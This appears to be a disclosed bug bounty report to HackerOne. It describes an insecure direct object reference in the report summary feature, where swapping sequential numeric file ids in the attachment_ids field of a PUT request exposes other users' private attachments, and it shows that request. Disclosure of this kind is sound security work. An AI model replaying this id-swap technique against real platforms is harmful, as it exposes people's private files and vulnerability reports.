Summary:
Hackerone provides a form for reporting vulnerabilities to various programs. where the form supports uploading files & previews (images or videos) but is not allowed to use file ids belonging to other accounts. but with the sumary report feature I as a hacker can reveal files belonging to other users just changing the id. this is very severe.
Description:
I have tried to call files belonging to other accounts through the submit report, edit report form but it doesn’t work it always gets the response "was_successful":false,
. but fortunately I can find another endpoint that is able to read files belonging to other accounts, namely in the sumary report feature.
If you look at the video I attached, there I made the scenario “failed to read other account files” & “successfully read other account files” as for the steps as follows:
note : left victim right attacker
{F3155289}
I don’t know, uploading large files takes too long in attacth, I just put the poc via yt. : https://████ (private video)
or in gdrive, if yt can’t be seen yet : https://███████
####raw text in video :
attachment leaked via add sumary report :
victim file id :
3155239
I WILL CHANGE F3155244 TO 3155239
ATTACKER file :
3155241
3155242
"was_successful":true, (IF FILE FROM ATTACKER) I WILL CHANGE TO VICTIM FILE
"was_successful":false, WILL FALSE
trying leak via content : false positive
leak via sumary : successful
PUT /reports/████/summaries/███████ HTTP/2
Host: hackerone.com
.....all header ...
Content-Length: 908
Origin: https://hackerone.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
{"id":████████,"category":"researcher","content":"TESTEDIT\n\n{F3155244} ","updated_at":"2024-03-30T17:16:29.625Z","user":{"id":█████,"username":"█████","name":"██████████████","bio":"please see pdfx","cleared":false,"verified":false,"website":null,"location":"","created_at":"2024-03-29T11:27:50.077Z","url":"https://hackerone.com/██████████","hackerone_triager":false,"hackerone_employee":false,"user_type":"hacker","profile_picture_urls":{"small":"/assets/avatars/default-█████.png","medium":"/assets/avatars/default-███████.png","xtralarge":"/assets/avatars/default-███████.png"}},"can_view?":true,"can_create?":true,"attachments":[],"action_type":"publish","attachment_ids":[
3155239]}
This is very bad especially the id form is only numeric in order. I can just add all the file ids of the hackerone account. I can see other people’s pocs if it’s a video.